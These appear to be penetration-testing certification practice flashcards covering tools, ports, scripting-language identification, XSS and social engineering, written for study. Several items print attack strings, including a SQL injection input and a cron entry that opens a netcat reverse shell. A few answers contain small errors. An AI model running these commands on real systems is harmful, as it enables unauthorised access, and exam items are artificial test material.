Practice Exam Flashcards
Charles has compromised a Linux system and wants to capture traffic from the command line. What tool should he select?
A. Wireshark
B. netcat
C. grep
D. tcpdump
tcpdump
Charles will be most successful with tcpdump. Although you can capture packets with netcat, it provides far fewer built‐in functions and wouldn’t be the first choice for most penetration testers if they have a better option. Wireshark is a graphical tool, and grep is used for text searching, not packet capture.
Karen wants to use a wireless security tool to create a fake access point. Which of the common wireless security tools is best suited to this?
A. Aircrack‐ng
B. Kismet
C. WiFite
D. AirShark
Aircrack‐ng
Aircrack‐ng provides all of the tools required to conduct an evil‐twin attack. Wifite and Kismet both have other useful wireless security tools, and AirShark was made up for this question.
Kismet
Kismet is a wireless network detector, sniffer, and intrusion detection system used for penetration testing.
WiFite
WiFite is a tool designed to automate wireless attacks against various encryption types, including WEP, WPA, and WPS. It simplifies the process of testing the security of wireless networks by chaining together multiple attacks.
mdk4
Tool designed to exploit 802.11 protocol weakness and flaws
MDK4 is a Wi-Fi testing tool used to perform various wireless network attacks, such as deauthentication, beacon flooding, and other stress tests. It is commonly utilized for penetration testing of wireless networks to identify vulnerabilities.
Fern
wireless penetration testing tool used cracking wireless passwords and performing network penetration testing and more
Fern WiFi Cracker is a penetration testing tool designed for discovering and exploiting vulnerabilities in wireless networks. It provides capabilities for network discovery, cracking WEP/WPA/WPS keys, and performing other Wi-Fi security assessments.
John has been asked to notify his target organization of the specific times that his tests will occur during an unknown environment penetration test. After testing with limited success, he discovers that the system and security administrators were notified that he would be testing during that timeframe. What concern should John express to his employer?
A. The test should be conducted after hours to test staff responses outside the business day.
B. The system administrators may not accept the results of the test.
C. The test may not represent typical behavior due to the administrators knowing about it.
D. The test is valid and will provide more useful information about response capabilities due to the notification.
The test may not represent typical behavior due to the administrators knowing about it.
Penetration testers who discover that their target was notified of their testing when notification was not previously discussed may have to worry about their testing being spoiled. Administrators may have changed specific settings during the time the test occurred, and restored them after the fact—the authors of this book have seen this happen, with administrators turning firewalls on during the testing time to make systems “invisible,” and then turning them back off as soon as the test was over!
Maria is preparing to conduct a penetration test and wants to follow a penetration testing standard. Which of the following standards is most useful for her to base her process and procedures on?
A. OWASP
B. OSSTMM
C. ATT&CK
D. NIST
OSSTMM
The Open Source Security Testing Methodology Manual is the only standard from this list that is a penetration testing methodology. NIST is the National Institute for Standards and Technology and provides standards but isn’t a standard itself. ATT&CK is a framework and knowledgebase used to track and classify adversary tactics and techniques. OWASP is the Open Web Application Security Project, a foundation that works to improve the security of software, particularly web applications.
OSSTMM
The OSSTMM (Open Source Security Testing Methodology Manual) is a comprehensive framework for conducting security testing and analysis. It provides standardized guidelines for evaluating the operational security of systems, networks, and processes. The OSSTMM emphasizes verifiable and measurable results to ensure the reliability of the security assessment process.
Shen is conducting a penetration test and discovers signs of a past intrusion on the system. What action should she take first?
A. Document the evidence in her report.
B. Notify management.
C. Review the attack evidence and incorporate techniques in her own test.
D. Eradicate all traces of the attack from the system.
Notify management.
Shen is ethically obligated to immediately report the signs of a prior attack or criminal activity to management. She should do this prior to conducting any other activity and should await instructions before resuming the test.
Cameron is negotiating with a penetration testing organization and wants to create a document that details the deliverables and timelines that the vendor will use while providing the service. What type of document is he creating?
A. An EULA
B. An SOW
C. An NDA
D. An MSA
An SOW
Cameron is creating a statement of work, which describes what will be done and the amount of time it will take to complete it. A EULA is an end‐user license agreement, often associated with software. An NDA is a nondisclosure agreement, and an MSA is a master services agreement.
Which one of the following is an example of a process control that might be suggested to remediate a penetration test finding?
A. Firewall rule change
B. Security awareness campaign
C. DLP implementation
D. Two‐person control
Two‐person control
Two‐person control is an example of a business process that might be implemented as a security control. Firewall rule changes, and the implementation of a DLP system are examples of technical controls. A security awareness campaign is an example of a personnel control.
Victor is attempting to penetrate a web application and sends the following input to the application:
Victor’ AND 1=2;–
What type of SQL injection attack is Victor attempting?
A. Standard SQL injection
B. Blind content‐based SQL injection
C. Blind timing‐based SQL injection
D. Privileged SQL injection
Blind content‐based SQL injection
The use of the statement 1=2, which always evaluates to false, is a sign of a content‐based SQL injection attack. Standard SQL injection would not need to include this technique. Timing‐based attacks would include a command that triggers a delay. Privileged SQL injection is not a normal category of exploit.
Tim recently wrote a Bash script called passwordcracker.sh to perform password cracking. When he tried to execute the script during a penetration test, he received a permission denied error message. What command can Tim execute to correct this permission and allow only him, as the file’s owner, to execute the script?
A. chmod o+x passwordcracker.sh
B. chmod u+x passwordcracker.sh
C. chmod g+x passwordcracker.sh
D. chmod a+x passwordcracker.sh
chmod u+x passwordcracker.sh
The chmod u+x command adds execute permission for the file’s owner. The other commands all grant different permissions. The g+x argument provides execute permission to members of the file’s group. The o+x argument to chmod grants execute permission to everyone other the file’s user or group. The a+x argument provides execute permission to everyone.
Christopher is conducting a penetration test of an organization as part of an unknown environment assessment. He is currently testing a public‐facing web application. Which one of the following software testing techniques will not be available to him?
A. Static analysis
B. Dynamic analysis
C. Fuzz testing
D. Vulnerability scanning
Static analysis
Christopher can easily conduct vulnerability scanning using a web application testing tool because the website is public‐facing. This tool should be able to assist him with fuzz testing, which is a form of dynamic analysis. Christopher cannot, however, perform static analysis of the source code because he does not have access to that inside information as part of an unknown environment test.
MCDS, Inc. uses Microsoft’s Azure cloud to host their primary website and e‐commerce infrastructure. Steve has been asked to include both cloud‐hosted environments in a penetration test he is conducting. What step is critical to ensuring he has proper authorization to conduct scans of the cloud‐hosted systems?
A. He needs administrative rights for the Azure environment.
B. He needs sign‐off from the lead or manager of the infrastructure team.
C. He needs authorization from the third‐party provider.
D. He needs authorization from the organization’s ISP.
He needs authorization from the third‐party provider.
Steve needs authorization from the cloud service provider. In most cases, third‐party providers require prior authorization for penetration testing or other efforts that may cause issues for other users of their shared infrastructure or that may register as attacks against systems or services they host. Some simply don’t allow penetration tests, whereas others may have specific requirements for penetration testers.
Tiffany wants to gather OSINT data about the services that specific systems run in her target organization. Which of the following tools will not allow her to do this?
A. Censys
B. nmap
C. Shodan
D. theHarvester
nmap
Censys, Shodan, and theHarvester will all allow Tiffany to conduct OSINT information gathering that does not actively scan her target. Nmap is an active scanning tool and will not allow her to gather this type of information without connecting to the target systems and networks.
Censys
OSINT tool
Censys is an Open Source Intelligence (OSINT) tool used for discovering and analyzing devices connected to the internet. It collects data about servers, networks, and websites, allowing penetration testers to gather valuable information such as open ports, SSL certificates, and software versions. This makes it particularly useful for identifying potential vulnerabilities during the reconnaissance phase.
Shodan
OSINT Tool
Shodan is a search engine designed to locate and provide details about internet-connected devices and systems, such as servers, webcams, routers, and industrial control systems. It allows penetration testers to gather information on exposed devices, open ports, services, and vulnerabilities. Shodan is widely used for passive reconnaissance during penetration testing.
theHarvester
OSINT tool
theHarvester is a reconnaissance tool used to gather information about a target organization from publicly available sources. It automates the collection of data such as email addresses, subdomains, IPs, and URLs by querying search engines, public databases, and other resources. It is commonly employed during the passive reconnaissance phase of penetration testing.
Jack performs a scan using the command nmap 10.11.45.0/24. How many TCP ports will he scan?
A. 512
B. 1,000
C. 1,024
D. 65,535
1,000
By default, nmap will scan the most 1,000 most common TCP and UDP ports if it is not used with a command flag that provides it with a range of ports.
What happens in a double‐tagging attack after the tagged packet arrives at the first switch?
A. The switch reads both tags and forwards the packet to the VLAN listed in the first tag.
B. The switch reads both tags and forwards the packet to the VLAN listed in the second tag.
C. The switch forwards the packet to the VLAN listed in the first tag and removes it.
D. The switch forwards the packet to the VLAN listed in the second tag and removes it.
The switch forwards the packet to the VLAN listed in the first tag and removes it.
Double tagging relies on the fact that trunking is enabled on the target switch and that it will read the first tag and forward the packet to that VLAN after removing the tag. The next switch will see only the second tag (now the only tag) and will treat it like a normally tagged packet for that VLAN.
Which one of the following methods is not used to obtain user session cookies during a penetration test?
A. On‐path attack
B. Malware
C. Network eavesdropping
D. Tailgating
Tailgating
Tailgating is used to obtain physical access to a facility and can’t be used to obtain session cookies. Penetration testers seeking to obtain a session cookie may steal it by performing an on‐path attack, conducting network eavesdropping, or installing malware on the target user’s system.
Ann is performing a kerberoasting attack and has scanned for user accounts with SPNs set and had requested service tickets using SPNs. What should she do next?
A. Send service tickets to the server.
B. Extract the service tickets from memory and save them.
C. Insert NTLM hashes into the service tickets to authenticate.
D. Conduct an offline brute‐force attack against the SPNs.
Extract the service tickets from memory and save them.
The next step in Ann’s attack is to extract the service tickets from memory and to save them to a file. Then she can use an offline brute‐force attack against the passwords in the service tickets.
Keberoasting
Kerberoasting is an attack method used to exploit vulnerabilities in the Kerberos authentication protocol to obtain and potentially crack service account credentials.
This attack relies on weak passwords for service accounts, making strong password policies essential to defend against it
Steps of Keberoasting
Kerberoasting is an attack method used to exploit vulnerabilities in the Kerberos authentication protocol to obtain and potentially crack service account credentials.
Steps:
* Request a Service Ticket: The attacker, authenticated as a domain user, requests a service ticket (TGS) for a service principal name (SPN) of a target service account.
* Receive the Encrypted Ticket: The domain controller provides the TGS, which is encrypted using the service account’s NTLM hash.
* Extract the Ticket: The attacker extracts the TGS from memory using tools such as Mimikatz or PowerShell scripts.
* Crack the Ticket: The attacker uses offline brute force or dictionary attacks against the encrypted ticket to recover the plaintext password of the service account.
This attack relies on weak passwords for service accounts, making strong password policies essential to defend against it
Which one of the following combinations of authentication techniques is an example of multifactor authentication?
A. Username and password
B. Security question and PIN
C. ID card and fingerprint
D. ID card and smartphone app
ID card and fingerprint
An ID card is an example of “something you have” and a fingerprint is “something you are,” so that scheme qualifies as multifactor authentication. A username is an identification mechanism, not an authentication mechanism. Security questions and PINs are both “something you know,” so they do not constitute multifactor authentication when used together. ID cards and smartphone apps are both examples of “something you have.”
Richard is conducting network reconnaissance as part of a penetration test and would like to use a tool that allows him to scan the entire network and identify potential vulnerabilities on servers in the target organization. Which one of the following tools would meet Richard’s needs?
A. Nmap
B. Metasploit
C. Nessus
D. Kismet
Nessus
Nessus is a popular network vulnerability scanning tool that would meet Richard’s requirements. The other tools listed do not perform network vulnerability scanning. Nmap is a port scanner that only reports open ports, not vulnerabilities. Metasploit is an exploitation framework useful in later phases of the penetration test.
The company that Greg works for has recently undergone a penetration test, and the pentesters discovered that employees did not have appropriate separation of duties. Which of the following operational controls is not helpful when attempting to address this finding?
A. Job rotation
B. Time‐of‐day restrictions
C. Mandatory vacation
D. User training
Time‐of‐day restrictions
Separation of duties is intended to ensure that a single individual cannot take inappropriate actions. Time‐of‐day restrictions do not help with separation of duties, but they do help prevent staff or members or penetration testers from using credentials after hours. That means that job rotation and mandatory vacations are useful because they can offer a chance for malfeasance to be discovered. User training can also help by ensuring that staff members know what is expected of them and what is not allowed.
Examine the following code snippet, used to create a URL:
$ip = “10.5.5.2”
$port = “80”
$url = “http://” + $ip + “:” + $port
What language is being used?
A. Python
B. Ruby
C. PowerShell
D. Bash
PowerShell
The use of dollar signs to prefix variable names signals that this is code written in PowerShell. Ruby and Python also use the + operator for concatenation.
Matthew is writing the report from a penetration test and would like to communicate his results using standard language. Which one of the following components of the NIST Security Content Automation Protocol (SCAP) can he use to describe security flaws in a standardized way?
A. CPE
B. CVSS
C. CCE
D. CVE
CVE
The Common Vulnerabilities and Exposures (CVE) standard provides a consistent way to describe security flaws. The Common Vulnerability Scoring System (CVSS) also involves vulnerabilities but provides a standardized way to discuss vulnerability severity, not the vulnerabilities themselves. Common Platform Enumeration (CPE) is used to provide a standard nomenclature for describing product names and versions. Common Configuration Enumeration (CCE) provides a standard nomenclature for discussing system configuration issues.
PowerShell script identifiers
- Windows originally, now also on Mac and Linux
- Uses cmdlet-based syntax like Get-, Set-, and Invoke-.
- Often includes .ps1 file extensions.
- May use Write-Output or Write-Host for displaying text.
- Variables are prefixed with a $ (e.g., $VariableName).
Bash script identifiers
- Used in Linux and Mac (and WSL)
- Often includes #!/bin/bash as a shebang (beginning) line at the start of scripts.
- Uses shell commands like fi, echo, ls, and cat.
- .sh files
- Variable assignment does not use a $ but references variables with $ (e.g.,
- myVar=value and echo $myVar).
- Includes control structures like if [ … ]; then.
Python script identifiers
- Colons
- Uses indentation to define blocks instead of braces or keywords.
- File extensions are .py.
- Common syntax includes print(), def for functions, and import for libraries.
- Variables are untyped and not prefixed.
Ruby script identifiers
- File extensions are .rb.
- Uses puts or print for output.
- Commonly uses def to define methods and end to close blocks.
- Includes symbols like : (e.g., :symbolName) and often uses do … end for blocks.
Perl script identifiers
- File extensions are .pl.
- Variables are prefixed with $ (scalars), @ (arrays), or % (hashes).
- Uses print for output.
- Frequently uses regular expressions, indicated by =~ or /…/.
- /n = new line; Perl does not automatically carriage return
- semicolon at end of every command
JavaScript script identifiers
- May use .js as file extensions.
- Frequently includes function keyword or arrow syntax (=>).
- Uses {} for blocks and console.log() for output.
- Variables are defined using var, let, or const.
CPE
Common Platform Enumeration
CPE stands for Common Platform Enumeration, a standardized method of naming software, hardware, and operating systems. It provides a consistent way to identify technology products, enabling easier integration and analysis of vulnerability information.
CVSS
CVSS, or Common Vulnerability Scoring System, is a standardized framework for assessing the severity of software vulnerabilities. It provides a numerical score (ranging from 0.0 to 10.0) and corresponding qualitative ratings (e.g., Low, Medium, High, Critical) to help organizations prioritize remediation efforts
CCE
Common Configuration Enumeration
CCE stands for Common Configuration Enumeration, a standardized identifier system for security-related configuration issues. It provides unique identifiers for configuration settings to help organizations manage and audit their systems more effectively. CCE is often used alongside other frameworks like CVE to enhance vulnerability and compliance management
CVE
Common Vulnerabilities and Exposures
CVE stands for Common Vulnerabilities and Exposures, a standardized system for identifying and cataloging known security vulnerabilities in software and hardware. Each CVE entry includes a unique identifier, a brief description of the vulnerability, and references to additional information about it. CVEs are widely used by vulnerability management tools to assess and prioritize risks in systems.
What information is most important to target selection for wireless networks?
A. The wireless standard (G, N, AC) used by the organization
B. The SSIDs that belong to the target company
C. The EMEI number associated with the access points
D. Whether the network uses WPA2 or WEP
The SSIDs that belong to the target company
Selecting the correct target is critical to a penetration test, and that requires you to know the SSIDs used by the target. If you conduct penetration testing activities against a network that you are not authorized to attack, you may be breaking the law and could cause unintended harm to an organization that you don’t have a contract with!
Joe is conducting a network vulnerability scan against his data center and receives reports from system administrators that the scans are slowing down their systems. There are only performance problems on individual hosts and no network connectivity issues.
Which setting would be most likely to correct the problem?
A. Scan IP addresses in a random order
B. Network timeout (in seconds)
C. Max simultaneous checks per host
D. Max simultaneous hosts per scan
Max simultaneous checks per host
Of the choices presented, the maximum number of simultaneous checks per host is the only setting that would positively affect individual systems. Changing the number of simultaneous hosts per scan and the network timeout would have an effect on the broader network. Randomizing IP addresses would not have a performance impact.
After compromising a user account on a Linux system, Ben discovers that he is unable to change directories and that he can’t set path or shell variables or redirect output. What has he most likely encountered?
A. The account is not on the sudoers list.
B. The account is a service account.
C. The account is using a restricted shell.
D. The account is not a valid user account.
The account is using a restricted shell.
Ben’s first guess should be that the account he has gained access to is using a restricted shell. Restricted shells commonly prevent users from changing directories, setting PATH or SHELL variables, specifying absolute pathnames, and redirecting output.
Restricted Shell
A restricted shell is a security feature used to limit the commands and actions that a user can perform in a shell environment. It modifies the behavior of the standard shell to restrict access to certain commands, directories, and functionalities, thereby reducing the risk of unauthorized or harmful activities by the user.
Common restrictions in a restricted shell include:
* Limiting the ability to change directories.
* Preventing the execution of certain commands or scripts.
* Restricting access to specific files or system paths.
Mike is conducting a penetration test and is using the results of an internal network vulnerability scan to guide his work. He is conducting his test from an external location. The report shows that a web application has a SQL injection vulnerability. He can access the web server but cannot exploit the vulnerability successfully. What is the least likely cause of Mike’s inability to exploit the vulnerability?
A. A network firewall is blocking access to the server.
B. An intrusion prevention system is detecting the attempt and blocking it.
C. Administrators already remediated the vulnerability.
D. A web application firewall is filtering the request.
A network firewall is blocking access to the server.
If a network firewall were blocking access to the server, Mike would not be able to access the application at all. However, an intrusion prevention system or web application firewall might allow normal access to the server but block attempts to conduct a SQL injection attack. It is also possible that administrators detected and remediated the vulnerability before Mike attempted his exploit.
Anand has discovered the following exploit code. What language is it written in and what does it do?
import requests
url = ‘https://example.com/example.txt’
data = requests.get(url, allow_redirects=True)
open(‘example.txt’, ‘wb’).write(data.content)
A. Perl, file upload
B. JavaScript, file download
C. Ruby, file upload
D. Python, file download
Python, file download
This is a simple Python file download script. You can see it defines a request and then opens it to write the content to a file from a URL.
Ralph discovers a file containing hashed passwords during a penetration test but is able to crack 90 percent of them using Jack the Ripper. What finding should Ralph report in his final report?
A. Plain‐text passwords
B. Weak password encryption
C. Weak password complexity
D. No multifactor authentication
Weak password complexity
The only conclusion Ralph can reach from the information available is that the organization does not have a strong password complexity policy. If they did, the percentage of cracked passwords would be much lower. The scenario indicates that the passwords are hashed, so they are neither stored in plain text nor encrypted. We do not know from the information given whether multifactor authentication is in use.
Examine the following object. What language was most likely used for this object?
{
“system”: {
“hostname”: “www.certmike.com”,
“ip”: “54.174.107.98”,
“security_scanned”: true
}
}
A. JSON
B. XML
C. HTML
D. SQL
JSON
This is an example of a JavaScript Object Notation (JSON) object. We can determine this by noting that it uses the key‐value store format to define attributes. The object lacks the ˂˃ and ˂/˃ tags that would be found in a markup language like XML or HTML. It is not a database query written in Structured Query Language (SQL)
Conducting a social engineering exercise against his target, Greg tells a story claiming that only a few members of the staff will be recognized for assisting with the project he is working on. What motivation technique has he used?
A. Authority
B. Scarcity
C. Urgency
D. Likeness
Scarcity
Scarcity‐based persuasion focuses on limited rewards or opportunities. This can sound similar to urgency‐based efforts, which focus on limited time. Appeals to authority leverage making the target believe that you have the right or role to require them to perform an action, whereas likeness uses similarity with the penetration tester to build trust.
Orlando is writing a PowerShell script and tests the TCP ports open on a system using the following syntax:
port -lt 80
Which of the following ports would match this expression?
A. 22
B. 80
C. 443
D. All of the above
22
The -lt operator says that the variable on the left must be strictly less than the variable on the right. Port 22 is the only port that is strictly less than 80.
XML things to remember
- Uses custom-defined tags for structuring data, e.g., < tag > value < / tag >.
- Requires closing tags for each element or uses self-closing tags, e.g., \ < tag / >
- Supports attributes within tags, e.g., <tag attribute=”value”>content</tag>.
JSON things to remember
- Data is organized in key-value pairs within curly braces, e.g., {“key”: “value”}.
- Arrays are enclosed in square brackets, e.g., [“value1”, “value2”].
- Values can be strings, numbers, objects, arrays, or true, false, and null.
HTML things to remember
- Uses predefined tags for web content, e.g., < html >, < body >.
- Tags are not case-sensitive but typically written in lowercase.
- Allows inline JavaScript and CSS, often leading to potential security issues (e.g., XSS).
SQL things to remember
- Consists of commands and clauses, e.g., SELECT, INSERT, WHERE.
- Uses semicolon (;) to terminate statements.
- Case-insensitive for commands but case-sensitive for database and column names depending on the system.
PowerShell comparsion operators
always start with a hyphen
- -lt: Less than
- -le: Less than or equal to
- -eq: Equal to
- -ne: Not equal to
- -gt: Greater than
- -ge: Greater than or equal to
Analyze the following segment of code:
if server == 1
ip = ‘10.1.1.1’
elsif server == 2
ip = ‘10.1.1.2’
else
ip = ‘10.1.1.3’
end
What language is this code written in?
A. Ruby
B. Bash
C. Python
D. PowerShell
Ruby
We can analyze this code using the flowchart shown in this figure. Following this chart, we can quickly determine that the code is written in Ruby due to the use of the end statement.
Which of the following programming languages will generate an error if the script attempts to concatenate a string and an integer without first performing an explicit conversion?
A. Bash
B. Ruby
C. PowerShell
D. All of the above
Ruby
Bash and PowerShell both allow the concatenation of strings and integers without an explicit conversion. Ruby (and Python) will generate an error if this is attempted.
Kaiden is in the process of penetration testing a web application belonging to his target organization. He would like to use a tool specifically designed to perform automated web application testing. Which one of the following tools is best suited for this task?
A. Immunity
B. Nikto
C. ZAP
D. Metasploit
Nikto
Nikto is an automated web application vulnerability scanner that would be perfect for Kaiden’s purposes. Immunity Debugger is a software debugging tool for developers that would not be useful during a web application test. ZAP is a web proxy, and Metasploit is an exploitation framework. Both ZAP and Metasploit may be used during testing, but they are manual tools that do not perform automated scans.
Immunity
Immunity in the context of penetration testing tools refers to Immunity Debugger, which is designed specifically for supporting penetration tests and reverse engineering malware. It allows for dynamic analysis of executable files, making it a valuable tool for identifying vulnerabilities in software.
ZAP
ZAP, short for Zed Attack Proxy, is an interception proxy developed by the Open Web Application Security Project (OWASP). It allows penetration testers to intercept, modify, and analyze requests sent from web browsers to web servers, making it a valuable tool for identifying web application vulnerabilities. ZAP supports manual and automated testing
Sticky Bit
a permission setting on a directory. It restricts the ability to delete or rename files in the directory to the file owner, the directory owner, or the root user.
In Linux permissions, the sticky bit is represented by the letter t in the execute (x) position for others. It appears in the file or directory’s permission string when listed with ls -l.
drwxrwxrwt 7 root root 4096 Dec 14 /tmp
SUID file
on Linux with the Set User ID (SUID) bit set. This bit tells the system that the file should execute with the permissions of the file’s owner rather than the user running it. This is particularly useful for files that need root-level privileges to perform specific functions.
The SUID bit is represented as an s in the file’s permissions (e.g., -rwsr-xr-x).
-rwsr-xr-x 7 root root 4096 Dec 14 /tmp
find / -perm -4000
This locates all files with the SUID bit set
Examine the following line of code:
puts(“The system contains several serious vulnerabilities.”)
What programming language is it written in?
A. Python
B. Bash
C. PowerShell
D. Ruby
Ruby
The puts command is used to display output when developing code in Ruby.
During a penetration test, Fred conducts network eavesdropping and manages to obtain an HTTP cookie from web traffic. What attack can he wage using this information?
A. Password cracking
B. Session hijacking
C. On‐path attack
D. Pass‐the‐ticket
Session hijacking
Session hijacking attacks involve stealing the cookie belonging to a valid user and using it to take over the HTTP session. Cookies would not be useful in password cracking attacks because the password has already been exchanged when the user has a cookie. On‐path attacks involve serving as an intermediary in user communication with a server and do not require a valid cookie. Pass‐the‐ticket attacks exploit vulnerabilities in Kerberos, which is not mentioned in this scenario.
During a port scan of a server, Maddox discovered that the following ports are open on the internal network:
TCP port 25
TCP port 80
TCP port 110
TCP port 443
TCP port 1433
TCP port 3389
The scan results provide evidence that a variety of services are running on this server. Which one of the following services is not indicated by the scan results?
A. Web
B. Database
C. SSH
D. RDP
SSH
Web servers commonly run on ports 80 (HTTP) and 443 (HTTPS). Database servers commonly run on ports 1433 (Microsoft SQL Server), 1521 (Oracle), and 3306 (MySQL). Remote Desktop Protocol (RDP) services commonly run on port 3389. There is no evidence that SSH, which uses TCP port 22, is running on this server.
Ports to Remember
- 20, 21
- 22
- 23
- 25
- 53
- 67, 68
- 69
- 80
- 88
- 110
- 123
- 135, 136
- 137, 138, 139
- 161, 162
- 389
- 443
- 445
- 500
- 1433, 1434
- 1521
- 1812, 1831
- 3389
- 8080, 8443
- 20, 21 (TCP/UDP): FTP (File Transfer Protocol) – Data and control channels.
- 22 (TCP/UDP): SSH (Secure Shell).
- 23 (TCP/UDP): Telnet.
- 25 (TCP/UDP): SMTP (Simple Mail Transfer Protocol).
- 53 (UDP): DNS (Domain Name System).
- 67, 68 (TCP/UDP): DHCP (Dynamic Host Configuration Protocol) – Server and client.
- 69 (UDP): TFTP (Trivial File Transfer Protocol).
- 80 (TCP/UDP): HTTP (Hypertext Transfer Protocol).
- 88 (TCP/UDP): Kerberos.
- 110 (TCP/UDP): POP3 (Post Office Protocol 3).
- 123 (TCP/UDP): NTP (Network Time Protocol).
- 135, 136 (TCP/UDP): Microsoft RPC
- 137, 138, 139 (TCP/UDP): NetBIOS services.
- 143 (TCP): IMAP (Internet Message Access Protocol).
- 161, 162 (UDP): SNMP (Simple Network Management Protocol).
- 389 (TCP/UDP): LDAP (Lightweight Directory Access Protocol).
- 443 (TCP/UDP): HTTPS (Hypertext Transfer Protocol Secure).
- 445 (TCP): SMB (Server Message Block) and Microsoft AD.
- 500 (TCP/UDP): ISAKMP/IKE (Internet Key Exchange).
- 1433, 1434 (TCP/UDP): Microsoft SQL services.
- 1521 (TCP): Oracle database listener.
- 1812, 1813 (TCP/UDP): RADIUS (Remote Authentication Dial-In User Service).
- 3389: RDP
- 8080, 8443 (TCP): Alternative HTTP/HTTPS ports for web services
Chuck is creating a new cybersecurity testing application and needs a variable that will contain the domain name of a single system. What data type is appropriate for his needs?
A. Integer
B. String
C. Array
D. List
String
A domain name is a text value, so it should be stored in a string variable. Integers are numeric data, so that would not be appropriate in this case. Arrays and lists could contain multiple domain names, but they are too complex for Chuck’s needs.
Jason uses Metasploit’s Mimikatz functionality to dump the following hashes from the Windows SAM on a compromised workstation.
Which of the following tools won’t work to crack the hashes?
A. John the Ripper
B. RainbowCrack
C. hashcat
D. Mimikatz
Mimikatz
Although Mimikatz is an excellent tool for obtaining and using hashes, it doesn’t include hash cracking features like John, RainbowCrack, and hashcat.
Window SAM
The Windows SAM (Security Accounts Manager) is a database used by Windows to store user account credentials, including password hashes. It resides in the file system, typically located at:
C:\Windows\System32\config\SAM
The SAM file is encrypted and protected to prevent unauthorized access. It contains password hashes rather than plaintext passwords and is commonly targeted by penetration testers or attackers after gaining system-level access. Tools like Mimikatz or Metasploit are often used to dump the SAM file for analysis and potential hash cracking
Eric is attempting to gain user credentials by tricking the user into providing a password into a fake form field generated through a cross‐site scripting attack. The attack is included in a message posted to an Internet forum. What term can be used to describe this attack?
A. Reflected XSS
B. Stored XSS
C. Consistent XSS
D. Decentralized XSS
Stored XSS
Stored (or persistent) cross‐site scripting (XSS) attacks use content that is stored in a location where the victim is likely to retrieve it. A message board posting fits into this category. Reflected XSS attacks occur when the script is provided to a web application as input that is immediately displayed as output. Consistent and decentralized are not categories of XSS attacks.
Reflected XSS
occurs when malicious input sent to a web server is immediately returned to the victim in the server’s response, without proper validation or sanitization.
- Delivery: Typically via phishing emails, malicious links, or forms.
- Immediate execution: The script is embedded in the server’s response and executes as soon as the victim accesses the crafted link.
- Scope: Affects individual users, not stored on the server.
Stored XSS
occurs when malicious scripts are permanently stored on a server (e.g., in a database, message board, or comment section). When other users access the affected page, the malicious script is executed in their browsers.
- Persistent attack: The malicious payload is stored on the server and affects all users who access the content.
- Higher impact: Can target multiple users over time.
- Common entry points: Input fields like comments, profile updates, or feedback forms.
DOM Based XSS
occurs when a malicious script is executed entirely on the client side, within the browser’s Document Object Model (DOM). The server does not directly include the malicious payload in its response; instead, the client-side JavaScript processes the input in an insecure way, leading to the execution of malicious code.
- Client-side vulnerability: The issue lies in how the browser’s DOM manipulates or renders user-supplied input.
- No server reflection: The server itself does not send the malicious script. Instead, client-side code dynamically creates or modifies DOM elements based on user input.
- Example sources: window.location, document.URL, or document.referrer.
Renee is conducting reconnaissance of an organization during a penetration test and discovers URLs in the organization’s web applications that have the following format:
https://www.targetorganization.com/referto=www.anothercompany.com
What type of exploit would likely be successful against this application?
A. Unvalidated redirect
B. Cross‐site scripting
C. Command injection
D. Insecure direct object reference
Unvalidated redirect
The presence of another URL (www.anothercompany.com) in the query string indicates that this site may be susceptible to an unvalidated redirect attack. Renee should further test this by attempting to change the URL and determining whether the redirection still takes place.
During a penetration test, Eleanor gains access to the /etc/passwd file on a modern Linux machine. What tool can she use to obtain passwords from the file?
A. Hashcat
B. Mimikatz
C. PowerSploit
D. None of the above
None of the above
Modern Linux systems do not store password hashes in /etc/passwd and instead store them in /etc/shadow. Gaining access to /etc/passwd can be helpful to understand the accounts that a system has provisioned locally and what shells they use, but doing so won’t be useful for actual password recovery in almost all cases.
Jessica plugs her laptop into an accessible network jack at her target organization and then changes her MAC address. What security technology is she most likely trying to bypass?
A. NAC
B. 802.11g
C. WPA
D. Port knocking
NAC
Network Access Control (NAC) systems can use a number of techniques to prevent unknown systems from connecting, but some use MAC address validation as part of their filtering. Of the list of options, the most likely is that Jessica is trying to bypass the organization’s NAC system.
Frank is conducting a penetration test and discovers that the client’s website contains a list of usernames and passwords that is publicly exposed on the Internet. How should Frank communicate this to the client?
A. In the final report
B. In the executive summary
C. Immediately
D. All of the above
All of the above
This is a critical finding and should trigger an immediate communication to the client so that it may be remediated. Frank should also include the finding in the detailed and executive summary sections of the final report, since it is a very significant issue.
What information will the following command sequence gather?
nc 10.10.11.55
GET / HTTP/3.0
A. The web server’s banner
B. The route to the web server
C. The network category of the web server
D. This command is not properly formatted and will not work
The web server’s banner
This command calls Netcat to connect to TCP port 80 on a system with the IP address 10.10.11.55. Presuming this is a web server, the HTTP GET command that follows will fetch the web server’s banner—or at least an error message with useful banner information!
Lucas wants to acquire GPS data from images he discovered on a target website. Which of the following tools is best suited to recovering the metadata he is looking for?
A. strings
B. metascan
C. exiftool
D. grep
exiftool
Exiftool is a quick and easy tool that can allow Lucas to see the metadata embedded in image files. The strings tool can be used to extract text strings from files, but it’s not as useful for metadata recovery. Grep is a search tool, and metascan was made up for this question.
Gary places the following command in the cron.daily file on a Linux system:
45 0 2 * * /bin/nc -e /bin/sh 10.10.10.1 1024
What will occur?
A. Netcat will download a file from 10.10.10.1 every month on the 2nd day of the month.
B. Netcat will open a reverse shell to 10.10.10.1 from port 1024 every day at 12:45 a.m.
C. Netcat will open a reverse shell to 10.10.10.1 on port 1024 every month on the 2nd day of the month.
D. Netcat will grab the banner from 10.10.10.1 every day at 12:45 a.m.
Netcat will open a reverse shell to 10.10.10.1 on port 1024 every month on the 2nd day of the month.
This cronjob runs at 12:45 on the 2nd day of every month and opens a reverse shell to 10.10.10.1 on port 1024.
Isaac runs Hydra against a target system on port 22. What type of attack is he using, and what service is he most likely using it against?
A. SQL injection, a web application
B. SSH injection, an SSH server
C. FTP brute forcing, a secure FTP server
D. SSH brute forcing, an SSH server
SSH brute forcing, an SSH server
Hydra is a brute‐forcing tool, and port 22 is typically associated with SSH. It is most likely that Isaac is attempting to brute‐force an SSH server.
Hydra
widely used brute-force password attack tool designed to crack authentication for various protocols and services, including SSH, HTTP/HTTPS, SMB, and databases. It uses wordlists or dictionaries to test username and password combinations against a target system and supports parallel threads for faster attacks.
Robert runs a port scan of a public‐facing web server from an external IP address and finds that the only two ports accessible on the server are 443 and 1433. What finding can he report based upon this information?
A. Unnecessary open services
B. No multifactor authentication
C. SQL injection vulnerability
D. Weak password complexity
Unnecessary open services
